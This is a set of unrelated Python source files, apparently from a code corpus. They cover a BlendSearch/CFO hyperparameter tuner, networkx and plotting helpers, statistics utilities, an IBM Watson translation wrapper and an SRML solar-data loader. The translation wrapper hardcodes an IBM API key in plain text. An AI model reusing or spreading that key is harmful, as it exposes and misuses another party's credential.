gs_seed = seed - 10 if (seed - 10) >= 0 else seed - 11 + (1 << 32)
self._gs = GlobalSearch(space=space, metric=metric, mode=mode, seed=gs_seed)
except TypeError:
self._gs = GlobalSearch(space=space, metric=metric, mode=mode)
else:
self._gs = None
self._ls = LocalSearch(
init_config, metric, mode, cat_hp_cost, space,
prune_attr, min_resource, max_resource, reduction_factor, seed)
self._init_search()
def set_search_properties(self,
metric: Optional[str] = None,
mode: Optional[str] = None,
config: Optional[Dict] = None) -> bool:
if not self._ls.space:
if metric:
self._metric = metric
if self._metric_constraints:
# metric modified by lagrange
metric += self.lagrange
# TODO: don't change metric for global search methods that
# can handle constraints already
if mode:
self._mode = mode
self._ls.set_search_properties(metric, mode, config)
if self._gs is not None:
self._gs.set_search_properties(metric, mode, config)
self._init_search()
if 'time_budget_s' in config:
time_budget_s = config['time_budget_s']
if time_budget_s is not None:
self._deadline = time_budget_s + time.time()
SearchThread.set_eps(time_budget_s)
if 'metric_target' in config:
self._metric_target = config.get('metric_target')
return True
def _init_search(self):
'''initialize the search
'''
self._metric_target = np.inf * self._ls.metric_op
self._search_thread_pool = {
# id: int -> thread: SearchThread
0: SearchThread(self._ls.mode, self._gs)
}
self._thread_count = 1 # total # threads created
self._init_used = self._ls.init_config is None
self._trial_proposed_by = {} # trial_id: str -> thread_id: int
self._ls_bound_min = self._ls.normalize(self._ls.init_config)
self._ls_bound_max = self._ls_bound_min.copy()
self._gs_admissible_min = self._ls_bound_min.copy()
self._gs_admissible_max = self._ls_bound_max.copy()
self._result = {} # config_signature: tuple -> result: Dict
self._deadline = np.inf
if self._metric_constraints:
self._metric_constraint_satisfied = False
self._metric_constraint_penalty = [
self.penalty for _ in self._metric_constraints]
else:
self._metric_constraint_satisfied = True
self._metric_constraint_penalty = None
def save(self, checkpoint_path: str):
''' save states to a checkpoint path
'''
save_object = self
with open(checkpoint_path, "wb") as outputFile:
pickle.dump(save_object, outputFile)
def restore(self, checkpoint_path: str):
''' restore states from checkpoint
'''
with open(checkpoint_path, "rb") as inputFile:
state = pickle.load(inputFile)
self._metric_target = state._metric_target
self._search_thread_pool = state._search_thread_pool
self._thread_count = state._thread_count
self._init_used = state._init_used
self._trial_proposed_by = state._trial_proposed_by
self._ls_bound_min = state._ls_bound_min
self._ls_bound_max = state._ls_bound_max
self._gs_admissible_min = state._gs_admissible_min
self._gs_admissible_max = state._gs_admissible_max
self._result = state._result
self._deadline = state._deadline
self._metric, self._mode = state._metric, state._mode
self._points_to_evaluate = state._points_to_evaluate
self._gs = state._gs
self._ls = state._ls
self._config_constraints = state._config_constraints
self._metric_constraints = state._metric_constraints
self._metric_constraint_satisfied = state._metric_constraint_satisfied
self._metric_constraint_penalty = state._metric_constraint_penalty
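    # Checkpointing sketch (illustrative): save() pickles the whole searcher to
    # the given path; restore() later unpickles it and copies the saved fields
    # back onto the current instance.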
@property
def metric_target(self):
return self._metric_target
def on_trial_complete(self, trial_id: str, result: Optional[Dict] = None,
error: bool = False):
''' search thread updater and cleaner
'''
metric_constraint_satisfied = True
if result and not error and self._metric_constraints:
# account for metric constraints if any
objective = result[self._metric]
for i, constraint in enumerate(self._metric_constraints):
metric_constraint, sign, threshold = constraint
value = result.get(metric_constraint)
if value:
# sign is <= or >=
sign_op = 1 if sign == '<=' else -1
violation = (value - threshold) * sign_op
if violation > 0:
# add penalty term to the metric
objective += self._metric_constraint_penalty[
i] * violation * self._ls.metric_op
metric_constraint_satisfied = False
if self._metric_constraint_penalty[i] < self.penalty:
self._metric_constraint_penalty[i] += violation
result[self._metric + self.lagrange] = objective
if metric_constraint_satisfied and not self._metric_constraint_satisfied:
# found a feasible point
self._metric_constraint_penalty = [1 for _ in self._metric_constraints]
self._metric_constraint_satisfied |= metric_constraint_satisfied
thread_id = self._trial_proposed_by.get(trial_id)
if thread_id in self._search_thread_pool:
self._search_thread_pool[thread_id].on_trial_complete(
trial_id, result, error)
del self._trial_proposed_by[trial_id]
if result:
config = {}
for key, value in result.items():
if key.startswith('config/'):
config[key[7:]] = value
if error: # remove from result cache
del self._result[self._ls.config_signature(config)]
else: # add to result cache
self._result[self._ls.config_signature(config)] = result
# update target metric if improved
objective = result[
self._metric + self.lagrange] if self._metric_constraints \
else result[self._metric]
if (objective - self._metric_target) * self._ls.metric_op < 0:
self._metric_target = objective
if not thread_id and metric_constraint_satisfied \
and self._create_condition(result):
# thread creator
self._search_thread_pool[self._thread_count] = SearchThread(
self._ls.mode,
self._ls.create(
config, objective, cost=result[self.cost_attr])
)
thread_id = self._thread_count
self._thread_count += 1
self._update_admissible_region(
config, self._ls_bound_min, self._ls_bound_max)
elif thread_id and not self._metric_constraint_satisfied:
# no point has been found to satisfy metric constraint
self._expand_admissible_region()
# reset admissible region to ls bounding box
self._gs_admissible_min.update(self._ls_bound_min)
self._gs_admissible_max.update(self._ls_bound_max)
# cleaner
if thread_id and thread_id in self._search_thread_pool:
# local search thread
self._clean(thread_id)
def _update_admissible_region(self, config, admissible_min, admissible_max):
# update admissible region
normalized_config = self._ls.normalize(config)
for key in admissible_min:
value = normalized_config[key]
if value > admissible_max[key]:
admissible_max[key] = value
elif value < admissible_min[key]:
admissible_min[key] = value
def _create_condition(self, result: Dict) -> bool:
''' create thread condition
'''
if len(self._search_thread_pool) < 2:
return True
obj_median = np.median(
[thread.obj_best1 for id, thread in self._search_thread_pool.items()
if id])
return result[self._metric] * self._ls.metric_op < obj_median
def _clean(self, thread_id: int):
''' delete thread and increase admissible region if converged,
merge local threads if they are close
'''
assert thread_id
todelete = set()
for id in self._search_thread_pool:
if id and id != thread_id:
if self._inferior(id, thread_id):
todelete.add(id)
for id in self._search_thread_pool:
if id and id != thread_id:
if self._inferior(thread_id, id):
todelete.add(thread_id)
break
if self._search_thread_pool[thread_id].converged:
todelete.add(thread_id)
self._expand_admissible_region()
for id in todelete:
del self._search_thread_pool[id]
def _expand_admissible_region(self):
for key in self._ls_bound_max:
self._ls_bound_max[key] += self._ls.STEPSIZE
self._ls_bound_min[key] -= self._ls.STEPSIZE
def _inferior(self, id1: int, id2: int) -> bool:
''' whether thread id1 is inferior to id2
'''
t1 = self._search_thread_pool[id1]
t2 = self._search_thread_pool[id2]
if t1.obj_best1 < t2.obj_best2:
return False
elif t1.resource and t1.resource < t2.resource:
return False
elif t2.reach(t1):
return True
return False
def on_trial_result(self, trial_id: str, result: Dict):
''' receive intermediate result
'''
if trial_id not in self._trial_proposed_by:
return
thread_id = self._trial_proposed_by[trial_id]
if thread_id not in self._search_thread_pool:
return
if result and self._metric_constraints:
result[self._metric + self.lagrange] = result[self._metric]
self._search_thread_pool[thread_id].on_trial_result(trial_id, result)
def suggest(self, trial_id: str) -> Optional[Dict]:
''' choose thread, suggest a valid config
'''
if self._init_used and not self._points_to_evaluate:
choice, backup = self._select_thread()
if choice < 0: # timeout
return None
config = self._search_thread_pool[choice].suggest(trial_id)
if choice and config is None:
# local search thread finishes
if self._search_thread_pool[choice].converged:
self._expand_admissible_region()
del self._search_thread_pool[choice]
return None
# preliminary check; not checking config validation
skip = self._should_skip(choice, trial_id, config)
if skip:
if choice:
return None
# use rs when BO fails to suggest a config
for _, generated in generate_variants({'config': self._ls.space}):
config = generated['config']
break # get one random config
skip = self._should_skip(-1, trial_id, config)
if skip:
return None
if choice or self._valid(config):
# LS or valid or no backup choice
self._trial_proposed_by[trial_id] = choice
else: # invalid config proposed by GS
if choice == backup:
# use CFO's init point
init_config = self._ls.init_config
config = self._ls.complete_config(
init_config, self._ls_bound_min, self._ls_bound_max)
self._trial_proposed_by[trial_id] = choice
else:
config = self._search_thread_pool[backup].suggest(trial_id)
skip = self._should_skip(backup, trial_id, config)
if skip:
return None
self._trial_proposed_by[trial_id] = backup
choice = backup
if not choice: # global search
if self._ls._resource:
# TODO: min or median?
config[self._ls.prune_attr] = self._ls.min_resource
# temporarily relax admissible region for parallel proposals
self._update_admissible_region(
config, self._gs_admissible_min, self._gs_admissible_max)
else:
self._update_admissible_region(
config, self._ls_bound_min, self._ls_bound_max)
self._gs_admissible_min.update(self._ls_bound_min)
self._gs_admissible_max.update(self._ls_bound_max)
self._result[self._ls.config_signature(config)] = {}
else: # use init config
init_config = self._points_to_evaluate.pop(
0) if self._points_to_evaluate else self._ls.init_config
config = self._ls.complete_config(
init_config, self._ls_bound_min, self._ls_bound_max)
config_signature = self._ls.config_signature(config)
result = self._result.get(config_signature)
if result: # tried before
return None
elif result is None: # not tried before
self._result[config_signature] = {}
else: # running but no result yet
return None
self._init_used = True
self._trial_proposed_by[trial_id] = 0
self._search_thread_pool[0].running += 1
return config
def _should_skip(self, choice, trial_id, config) -> bool:
''' if config is None or config's result is known or constraints are violated
return True; o.w. return False
'''
if config is None:
return True
config_signature = self._ls.config_signature(config)
exists = config_signature in self._result
# check constraints
if not exists and self._config_constraints:
for constraint in self._config_constraints:
func, sign, threshold = constraint
value = func(config)
if (sign == '<=' and value > threshold
or sign == '>=' and value < threshold):
self._result[config_signature] = {
self._metric: np.inf * self._ls.metric_op,
'time_total_s': 1,
}
exists = True
break
if exists: # suggested before
if choice >= 0: # not fallback to rs
result = self._result.get(config_signature)
if result: # finished
self._search_thread_pool[choice].on_trial_complete(
trial_id, result, error=False)
if choice:
# local search thread
self._clean(choice)
# else: # running
# # tell the thread there is an error
# self._search_thread_pool[choice].on_trial_complete(
# trial_id, {}, error=True)
return True
return False
def _select_thread(self) -> Tuple:
''' thread selector; use can_suggest to check LS availability
'''
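        # Each thread's eci (presumably its estimated cost for improvement) is
        # refreshed from the current metric target and the fastest observed
        # speed; priorities are then recomputed from the smallest eci, and the
        # highest-priority thread is returned along with a backup in case its
        # proposal has to be skipped.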
# update priority
min_eci = self._deadline - time.time()
if min_eci <= 0:
return -1, -1
max_speed = 0
for thread in self._search_thread_pool.values():
if thread.speed > max_speed:
max_speed = thread.speed
for thread in self._search_thread_pool.values():
thread.update_eci(self._metric_target, max_speed)
if thread.eci < min_eci:
min_eci = thread.eci
for thread in self._search_thread_pool.values():
thread.update_priority(min_eci)
top_thread_id = backup_thread_id = 0
priority1 = priority2 = self._search_thread_pool[0].priority
for thread_id, thread in self._search_thread_pool.items():
# if thread_id:
# print(
# f"priority of thread {thread_id}={thread.priority}")
# logger.debug(
# f"thread {thread_id}.can_suggest={thread.can_suggest}")
if thread_id and thread.can_suggest:
priority = thread.priority
if priority > priority1:
priority1 = priority
top_thread_id = thread_id
if priority > priority2 or backup_thread_id == 0:
priority2 = priority
backup_thread_id = thread_id
return top_thread_id, backup_thread_id
def _valid(self, config: Dict) -> bool:
''' config validator
'''
normalized_config = self._ls.normalize(config)
for key in self._gs_admissible_min:
if key in config:
value = normalized_config[key]
if value + self._ls.STEPSIZE < self._gs_admissible_min[key] \
or value > self._gs_admissible_max[key] + self._ls.STEPSIZE:
return False
return True
try:
from ray.tune import (uniform, quniform, choice, randint, qrandint, randn,
qrandn, loguniform, qloguniform)
except ImportError:
from ..tune.sample import (uniform, quniform, choice, randint, qrandint, randn,
qrandn, loguniform, qloguniform)
try:
from nni.tuner import Tuner as NNITuner
from nni.utils import extract_scalar_reward
class BlendSearchTuner(BlendSearch, NNITuner):
'''Tuner class for NNI
'''
def receive_trial_result(self, parameter_id, parameters, value,
**kwargs):
'''
Receive trial's final result.
parameter_id: int
parameters: object created by 'generate_parameters()'
value: final metrics of the trial, including default metric
'''
result = {}
            for key, param_value in parameters.items():
                result['config/' + key] = param_value
reward = extract_scalar_reward(value)
result[self._metric] = reward
# if nni does not report training cost,
# using sequence as an approximation.
# if no sequence, using a constant 1
result[self.cost_attr] = value.get(self.cost_attr, value.get(
'sequence', 1))
self.on_trial_complete(str(parameter_id), result)
...
def generate_parameters(self, parameter_id, **kwargs) -> Dict:
'''
Returns a set of trial (hyper-)parameters, as a serializable object
parameter_id: int
'''
return self.suggest(str(parameter_id))
...
def update_search_space(self, search_space):
'''
Tuners are advised to support updating search space at run-time.
If a tuner can only set search space once before generating first hyper-parameters,
it should explicitly document this behaviour.
search_space: JSON object created by experiment owner
'''
config = {}
for key, value in search_space.items():
v = value.get("_value")
_type = value['_type']
if _type == 'choice':
config[key] = choice(v)
elif _type == 'randint':
config[key] = randint(v[0], v[1] - 1)
elif _type == 'uniform':
config[key] = uniform(v[0], v[1])
elif _type == 'quniform':
config[key] = quniform(v[0], v[1], v[2])
elif _type == 'loguniform':
config[key] = loguniform(v[0], v[1])
elif _type == 'qloguniform':
config[key] = qloguniform(v[0], v[1], v[2])
elif _type == 'normal':
config[key] = randn(v[1], v[2])
elif _type == 'qnormal':
config[key] = qrandn(v[1], v[2], v[3])
else:
raise ValueError(
f'unsupported type in search_space {_type}')
self._ls.set_search_properties(None, None, config)
if self._gs is not None:
self._gs.set_search_properties(None, None, config)
self._init_search()
except ImportError:
class BlendSearchTuner(BlendSearch):
pass
class CFO(BlendSearchTuner):
''' class for CFO algorithm
'''
__name__ = 'CFO'
def suggest(self, trial_id: str) -> Optional[Dict]:
# Number of threads is 1 or 2. Thread 0 is a vacuous thread
assert len(self._search_thread_pool) < 3, len(self._search_thread_pool)
if len(self._search_thread_pool) < 2:
# When a local converges, the number of threads is 1
# Need to restart
self._init_used = False
return super().suggest(trial_id)
def _select_thread(self) -> Tuple:
for key in self._search_thread_pool:
if key:
return key, key
def _create_condition(self, result: Dict) -> bool:
''' create thread condition
'''
return len(self._search_thread_pool) < 2
def create_next(client):
''' functional API for HPO
'''
state = client.get_state()
setting = client.get_settings_dict()
if state is None:
# first time call
try:
from ray.tune.trial import Trial
except ImportError:
from ..tune.trial import Trial
method = setting.get('method', 'BlendSearch')
mode = client.get_optimization_mode()
if mode == 'minimize':
mode = 'min'
elif mode == 'maximize':
mode = 'max'
metric = client.get_primary_metric()
hp_space = client.get_hyperparameter_space_dict()
space = {}
for key, value in hp_space.items():
t = value["type"]
if t == 'continuous':
space[key] = uniform(value["min_val"], value["max_val"])
elif t == 'discrete':
space[key] = choice(value["values"])
elif t == 'integral':
space[key] = randint(value["min_val"], value["max_val"])
elif t == 'quantized_continuous':
space[key] = quniform(value["min_val"], value["max_val"],
value["step"])
init_config = setting.get('init_config', None)
if init_config:
points_to_evaluate = [init_config]
else:
points_to_evaluate = None
cat_hp_cost = setting.get('cat_hp_cost', None)
if method == 'BlendSearch':
Algo = BlendSearch
elif method == 'CFO':
Algo = CFO
algo = Algo(
mode=mode,
metric=metric,
space=space,
points_to_evaluate=points_to_evaluate,
cat_hp_cost=cat_hp_cost,
)
time_budget_s = setting.get('time_budget_s', None)
if time_budget_s:
algo._deadline = time_budget_s + time.time()
config2trialid = {}
else:
algo = state['algo']
config2trialid = state['config2trialid']
# update finished trials
trials_completed = []
for trial in client.get_trials():
if trial.end_time is not None:
signature = algo._ls.config_signature(trial.hp_sample)
if not algo._result[signature]:
trials_completed.append((trial.end_time, trial))
trials_completed.sort()
for t in trials_completed:
end_time, trial = t
trial_id = config2trialid[trial.hp_sample]
result = {}
result[algo.metric] = trial.metrics[algo.metric].values[-1]
result[algo.cost_attr] = (end_time - trial.start_time).total_seconds()
for key, value in trial.hp_sample.items():
result['config/' + key] = value
algo.on_trial_complete(trial_id, result=result)
# propose new trial
trial_id = Trial.generate_id()
config = algo.suggest(trial_id)
if config:
config2trialid[config] = trial_id
client.launch_trial(config)
client.update_state({'algo': algo, 'config2trialid': config2trialid})
|
the-stack_106_22106
|
import networkx as nx
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
from itertools import product
import random
import math
from functools import wraps
import pandas as pd
from .information import mutual_information
def compose(f, g):
"""
:param f: Second function to apply
:param g: First function to apply
:return: A composition of functions
"""
return lambda *args, **kwargs: f(g(*args, **kwargs))
lmap = compose(list, map)
def sigmoid(x):
"""
Logistic sigmoid function
:param x: argument
:return: function value
"""
return 1 / (1 + math.exp(-x))
def extract_node_attribute(graph, name, default=None):
"""
    Extract attributes of a networkx graph's nodes into a dict.
:param graph: target graph
:param name: name of the attribute
:param default: default value (used if node doesn't have the specified attribute)
:return: a dict of attributes in form of { node_name : attribute }
"""
return { i : d.get(name, default) for i, d in graph.nodes(data=True) }
def extract_edge_attribute(graph, name, default=None):
"""
    Extract attributes of a networkx graph's edges into a dict.
:param graph: target graph
:param name: name of the attribute
:param default: default value (used if edge doesn't have the specified attribute)
:return: a dict of attributes in form of { (from, to) : attribute }
"""
return { (i, j) : d.get(name, default) for i, j, d in graph.edges(data=True) }
def pretty_draw(graph, node_color=lambda node, attr: '#DDDDDD',
edge_color=lambda node1, node2, attr: '#000000', node_size=lambda node, attr: 300, highres=False):
"""
Draws a graph. You can specify colors of nodes, colors of edges and size of nodes via lambda
functions.
:param graph: target graph
:param node_color: lambda function mapping node name and its attributes to the desired color
:param edge_color: lambda function mapping edge and its attributes to the desired color
:param node_size: lambda function mapping node name and its attributes to the desired size
:return: None
"""
if highres:
fig = plt.figure(figsize=(100, 100))
else:
fig = plt.figure(figsize=(17, 6))
plt.axis('off')
if type(node_color) is str:
node_colors = extract_node_attribute(graph, 'color', default='#DDDDDD')
node_colors = list(map(node_colors.__getitem__, graph.nodes()))
else:
node_colors = list(map(lambda args: node_color(*args), graph.nodes(data=True)))
if type(edge_color) is str:
edge_colors = extract_edge_attribute(graph, 'color', default='#000000')
edge_colors = list(map(edge_colors.__getitem__, graph.edges()))
else:
edge_colors = list(map(lambda args: edge_color(*args), graph.edges(data=True)))
if type(node_size) is str:
node_sizes = extract_node_attribute(graph, 'size', default='300')
node_sizes = list(map(node_sizes.__getitem__, graph.nodes()))
else:
node_sizes = list(map(lambda args: node_size(*args), graph.nodes(data=True)))
nx.draw_networkx(graph,
with_labels=True,
pos=nx.spring_layout(graph),
node_color=node_colors,
edge_color=edge_colors,
node_size=node_sizes
)
return None
def maximum_spanning_tree(graph, weight='weight'):
"""
Find a maximum spanning tree of a graph
:param graph: target graph
:param weight: edge attribute which will be used as edge weight
:return: maximum spanning tree graph (networkx.Graph)
"""
for i, j in graph.edges():
graph.edge[i][j][weight] = -graph.edge[i][j][weight]
result = nx.minimum_spanning_tree(graph, weight='weight')
for i, j in graph.edges():
graph.edge[i][j][weight] = -graph.edge[i][j][weight]
return result
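# Note on maximum_spanning_tree: it negates the edge weights in place, runs
# nx.minimum_spanning_tree, then restores the original weights; it also relies
# on the networkx 1.x `graph.edge` accessor.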
def plot_distr_2d(distr, domain=(-25, 25), use_domain=False):
"""
    Smart 1d probability distribution plotter. Finds the interval where most of the probability
    mass lies and plots the distribution on it (so you don't need to specify the x-axis interval).
:param distr: distribution to plot in (vectorized) form of numpy.array<float> -> numpy.array<float>
:param domain: a superset of plotting interval (to narrow search)
:return: None
"""
if not use_domain:
def binary_search_quantiles(quantile, begin, end, prec):
while end - begin > prec:
sep = (begin + end) / 2.0
#print(sep, sp.integrate.quad(distr, -np.inf, sep)[0])
if sp.integrate.quad(distr, -np.inf, sep)[0] < quantile:
begin = sep
else:
end = sep
return (begin + end) / 2.0
alpha = 0.001
begin = binary_search_quantiles(alpha, domain[0], domain[1], 0.1)
end = binary_search_quantiles(1 - alpha, domain[0], domain[1], 0.1)
if abs(end - begin) < 1e-10:
begin, end = domain
else:
begin, end = domain
x = np.arange(begin, end, (end - begin) / 1000)
try:
plt.plot(x, lmap(distr, x))
except:
plt.plot(x, lmap(lambda x: distr(np.array(x)), x))
return None
def plot_distr_3d(distr):
"""
Plot 2d probability distribution.
:param distr: the probability distribution to plot in form of [float, float] -> float
:return: None
"""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
X = np.arange(-10, 10, 0.25)
Y = np.arange(-10, 10, 0.25)
X, Y = np.meshgrid(X, Y)
Z = np.squeeze(np.array([[distr([X[i][j], Y[i][j]]) for j in range(X.shape[1])] for i in range(X.shape[0])]))
ax.plot_surface(X, Y, Z, color='#DDDDDD')
return None
def plot_distr(distr, dim=1, domain=(-25, 25), use_domain=False):
"""
Smart distribution plotting (whether 1d or 2d).
:param distr: the distribution to plot
:param dim: dimensionality (if known)
:param domain: domain for 1d version
:return: None
"""
if dim == 1:
try:
plot_distr_2d(distr, domain=domain, use_domain=use_domain)
except:
plot_distr_3d(distr)
else:
plot_distr_3d(distr)
return None
def flip_edge(graph, edge):
"""
Flips an edge in a networkx graph.
:param graph: a target graph
:param edge: edge to flip
:return: None
"""
if graph.has_edge(*edge):
graph.remove_edge(*edge)
else:
graph.add_edge(*edge)
return None
def spoil_graph(graph, p):
"""
'Spoils' a graph: flips every edge with probability p. Doesn't change the original graph.
:param graph: target graph
:param p: flip probability
:return: spoiled graph
"""
graph = graph.copy()
for i in range(len(graph.nodes())):
for j in range(i):
if random.random() < p:
flip_edge(graph, (i, j))
return graph
def reverse_edge(G, edge, copy=False):
"""
Reverse edge in graph.
:param G: target graph
:param edge: target edge
:param copy: if True, copy graph before changing it
:return: graph with reversed edge
"""
if copy:
G = G.copy()
x, y = edge
G.remove_edge(x, y)
G.add_edge(y, x)
return G
def are_equal_graphs(G1, G2):
"""
Check graph equality (equal node names, and equal edges between them).
:param G1: first graph
:param G2: second graph
:return: are they equal
"""
if set(G1.nodes()) != set(G2.nodes()):
return False
return all(map(lambda x: G1.has_edge(*x), G2.edges())) and all(map(lambda x: G2.has_edge(*x), G1.edges()))
def is_subgraph(G1, G2):
"""
Is G1 a subgraph of G2?
:param G1: supposed subgraph
:param G2: graph
:return: is G1 subgraph of G2
"""
return set(G1.edges()).issubset(set(G2.edges()))
def descendants(G, x):
"""
Set of all descendants of node in a graph, not including itself.
:param G: target graph
:param x: target node
:return: set of descendants
"""
return set(nx.dfs_preorder_nodes(G, x)) - {x}
def ancestors(G, x, G_reversed=None):
"""
Set of all ancestors of node in a graph, not including itself.
:param G: target graph
:param x: target node
:param G_reversed: you can supply graph with reversed edges for speedup
:return: set of ancestors
"""
if G_reversed is None:
G_reversed = G.reverse()
return descendants(G_reversed, x)
def reprsort(li):
"""
    sometimes, we need a way to get a unique ordering of any Python objects
so here it is!
(not quite "any" Python objects, but let's hope we'll never deal with that)
"""
extli = list(zip(map(repr, li), range(len(li))))
extli.sort()
return [li[i[1]] for i in extli]
class ListTable(list): # from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
"""
Overridden list class which takes a 2-dimensional list of
the form [[1,2,3],[4,5,6]], and renders an HTML Table in
IPython Notebook.
"""
def _repr_html_(self):
html = ["<table>"]
for row in self:
html.append("<tr>")
for col in row:
html.append("<td>{0}</td>".format(col))
html.append("</tr>")
html.append("</table>")
return ''.join(html)
def pretty_print_distr_table(table, names):
"""
Get a ListTable of the distribution specified by `table`, so that it can be
prettily rendered in ipython notebook
:param table: table of the distribution
:param names: names assigned to variables in table
:return: ListTable
"""
table = np.array(table)
t = ListTable()
t.append(names + ['P'])
for v in product(*lmap(compose(list, range), table.shape)):
t.append(list(v) + ["%0.3f" % table[v]])
return t
def pretty_print_distr_dict(d, names):
"""
Get a ListTable of the distribution specified by dict `d`, so that it can be
prettily rendered in ipython notebook.
:param d: dict of the distribution
:param names: names assigned to variables in dict
:return: ListTable
"""
t = ListTable()
t.append(names + ['P'])
items = list(d.items())
try:
items.sort()
except TypeError:
items = reprsort(items)
for v, p in items:
t.append(list(v) + ["%0.3f" % p])
return t
class permutation_dict(dict):
"""
A modification of dict.
    Tuple keys are considered equal if one can be obtained by permuting the other.
For example (1, 3, 2, 0) == (0, 1, 2, 3)
Also, hooks for __getitem__ and __setitem__ are provided.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._phook_setitem_ = lambda key, val: val
self._phook_getitem_ = lambda key, val: val
def __setitem__(self, arg, val):
if isinstance(arg, tuple):
arg = reprsort(list(arg))
arg = tuple(arg)
else:
arg = tuple([arg])
val = self._phook_setitem_(arg, val)
return super().__setitem__(arg, val)
def __getitem__(self, arg):
if isinstance(arg, tuple):
arg = reprsort(list(arg))
arg = tuple(arg)
else:
arg = tuple([arg])
return self._phook_getitem_(arg, super().__getitem__(arg))
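# Illustrative behaviour of permutation_dict: after d[(1, 3, 2)] = 'x', both
# d[(1, 3, 2)] and d[(2, 1, 3)] return 'x', because tuple keys are
# canonicalized (sorted by repr) before storage and lookup.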
def stabilize(alpha):
"""
Decorator which tries to reduce variance of a random function by
averaging it across multiple calls. Function must return a float.
:param alpha: required precision
:return: stabilized function
"""
def stabilize_decorator(f):
@wraps(f)
def new_f(*args, **kwargs):
x = 0.0
current = f(*args, **kwargs)
n = 1
while abs(x - current) > alpha or n == 1:
prev = current
x = f(*args, **kwargs)
current = (n / (n + 1)) * current + (x / (n + 1))
n += 1
return current
return new_f
return stabilize_decorator
def relmatrix(f, val1, val2):
"""
    A table (list of lists, including a header row and column) obtained by applying
    function `f` to combinations of values from `val1` and `val2`
:param f: applied function
:param val1: row values
:param val2: col values
    :return: list of lists -- the table
"""
res = [[''] + list(val2)]
for v1 in val1:
li = [v1]
for v2 in val2:
li.append(f(v1, v2))
res.append(li)
return res
def infotable(data):
"""
Table of pairwise mutual informations between variables in the dataset.
:param data: the dataset
:return: the resulting table
"""
n_var = data.shape[1]
return [[mutual_information(data[:, i1:i1+1], data[:, i2:i2+1]) for i2 in range(n_var)] for i1 in range(n_var)]
def infomatrix(data):
"""
Table of pairwise mutual informations between variables in the dataset in the form of ListTable
:param data: the dataset
:return: the resulting table as ListTable
"""
n_var = data.shape[1]
return ListTable(relmatrix(lambda i1, i2: mutual_information(data[:, i1:i1+1], data[:, i2:i2+1]), range(n_var), range(n_var)))
def colvec(arr):
"""
Transforms a numpy array into a column vector.
:param arr: target arrray
:return: column vector -- numpy array of shape (n, 1)
"""
return np.transpose(np.atleast_2d(arr))
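# Illustrative usage sketch (added for clarity; assumes the module's imports above
# are available). permutation_dict treats tuple keys as equal up to permutation,
# and stabilize() keeps re-sampling a noisy function until a new sample lies
# within alpha of the running mean.
if __name__ == '__main__':
    d = permutation_dict()
    d[(1, 3, 2, 0)] = 'value'
    assert d[(0, 1, 2, 3)] == 'value'  # same key, different order
    @stabilize(alpha=0.01)
    def noisy():
        # a noisy estimate of 1.0
        return np.random.normal(loc=1.0, scale=0.1)
    print('stabilized estimate:', noisy())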
|
the-stack_106_22108
|
"""Commonly used functions not available in the Python2 standard library."""
from __future__ import division
import math
from sys import float_info
NORM_EPSILON = math.pow(float_info.epsilon, 0.25) # half-precision works for machine learning
def mean(values):
values = list(values)
return sum(map(float, values)) / len(values)
def median(values):
values = list(values)
values.sort()
return values[len(values) // 2]
def median2(values):
"""
Returns the median of the input values;
if there are an even number of inputs, returns the mean of the middle two.
"""
values = list(values)
n = len(values)
if n <= 2:
return mean(values)
values.sort()
if (n % 2) == 1:
return values[n//2]
i = n//2
return (values[i - 1] + values[i])/2.0
def variance(values):
values = list(values)
m = mean(values)
return sum((v - m) ** 2 for v in values) / len(values)
def stdev(values):
return math.sqrt(variance(values))
def softmax(values):
"""
Compute the softmax of the given value set, v_i = exp(v_i) / s,
where s = sum(exp(v_0), exp(v_1), ..)."""
e_values = list(map(math.exp, values))
s = sum(e_values)
inv_s = 1.0 / s
return [ev * inv_s for ev in e_values]
# Lookup table for commonly used {value} -> value functions.
stat_functions = {'min': min, 'max': max, 'mean': mean, 'median': median,
'median2': median2}
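# Minimal usage sketch (illustrative; not part of the original module): running
# this file directly exercises a couple of the helpers above.
if __name__ == '__main__':
    # median2 averages the two middle values for an even-length input.
    assert median2([1, 2, 3, 4]) == 2.5
    # softmax of equal inputs is uniform.
    assert softmax([0.0, 0.0]) == [0.5, 0.5]
    print('softmax([1, 2, 3]) =', softmax([1, 2, 3]))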
|
the-stack_106_22110
|
from ibm_watson import LanguageTranslatorV3
languages = {
"English": "en",
"French": "fr",
"Spanish": "es",
"German": "de"
}
API_key = 'ujft9Uu2E6jFCcaYAiUxIKfs4w6DnFnX3C_hac2IDr_N'
def initLT():
return LanguageTranslatorV3(
version = '2018-05-01',
iam_apikey = API_key)
def translate(text, target, source=None, service=initLT()):
if target not in languages.values():
target = languages[target]
if source is None:
source = service.identify(text).get_result()["languages"][0]["language"].split("-")[0]
else:
if source not in languages.values():
source = languages[source]
return service.translate(text=text, model_id=source + "-" + target).get_result()["translations"][0]["translation"]
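# Illustrative usage sketch (kept as a comment: it assumes valid IBM Watson
# credentials and network access):
#
#   print(translate("Hello, how are you?", target="fr", source="en"))
#
# When `source` is omitted, translate() falls back to the service's language
# identification, as implemented above.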
|
the-stack_106_22111
|
import logging
import json
from urllib import error
from pkg_resources import resource_filename, Requirement
import pandas as pd
from pvlib import iotools
from requests.exceptions import HTTPError
from solarforecastarbiter.datamodel import Observation, SolarPowerPlant
from solarforecastarbiter.io.reference_observations import (
common, default_forecasts)
DEFAULT_SITEFILE = resource_filename(
Requirement.parse('solarforecastarbiter'),
'solarforecastarbiter/io/reference_observations/'
'srml_reference_sites.json')
# maps the desired variable names to those returned by pvlib.iotools
srml_variable_map = {
'ghi_': 'ghi',
'dni_': 'dni',
'dhi_': 'dhi',
'wind_speed_': 'wind_speed',
'temp_air_': 'air_temperature',
}
# maps SolarForecastArbiter interval_label to the SRML infix which
# designates the time resolution of each file. The list of file types
# is tried in order, so file types starting with 'P' designating
# processed data are listed first, such that if processed data exists
# we retrieve that first.
FILE_TYPE_MAP = {
1: ['PO', 'RO'],
5: ['PF', 'RF'],
15: ['PQ', 'RQ'],
60: ['PH', 'RH'],
}
logger = logging.getLogger('reference_data')
def adjust_site_parameters(site):
"""Inserts modeling parameters for sites with pv measurments
Parameters
----------
site: dict
Returns
-------
dict
Copy of inputs plus a new key 'modeling_parameters'.
"""
return common.apply_json_site_parameters(DEFAULT_SITEFILE, site)
def request_data(site, year, month):
"""Makes a request for each file type until successful or we
run out of filetypes.
Parameters
----------
site: :py:class:`solarforecastarbiter.datamodel.Site`
year: int
The year of the data to request.
month: int
The month of the data to request.
